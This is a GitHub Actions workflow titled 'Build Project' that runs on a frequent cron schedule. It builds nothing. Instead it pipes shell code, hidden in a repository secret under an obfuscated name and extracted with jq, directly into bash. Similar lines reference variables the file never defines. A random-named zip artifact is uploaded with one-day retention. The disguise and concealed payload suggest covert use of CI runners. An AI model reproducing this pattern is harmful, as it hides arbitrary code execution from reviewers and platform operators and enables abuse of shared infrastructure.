name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '46 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          bl66737: ${{ secrets.bl66737 }}
        run: |
          printf '%s' "$bl66737" | jq -r .vem0 | /bin/bash
          echo $ke250 | jq -r .wy889 | /bin/bash
          printf '%s' "$ps5" | jq -r .xti4270 | /bin/bash
          printf '%s' "$xqh2" | jq -r .iootk387 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: FjnrIRHC
          path: "*.zip"
          retention-days: 1
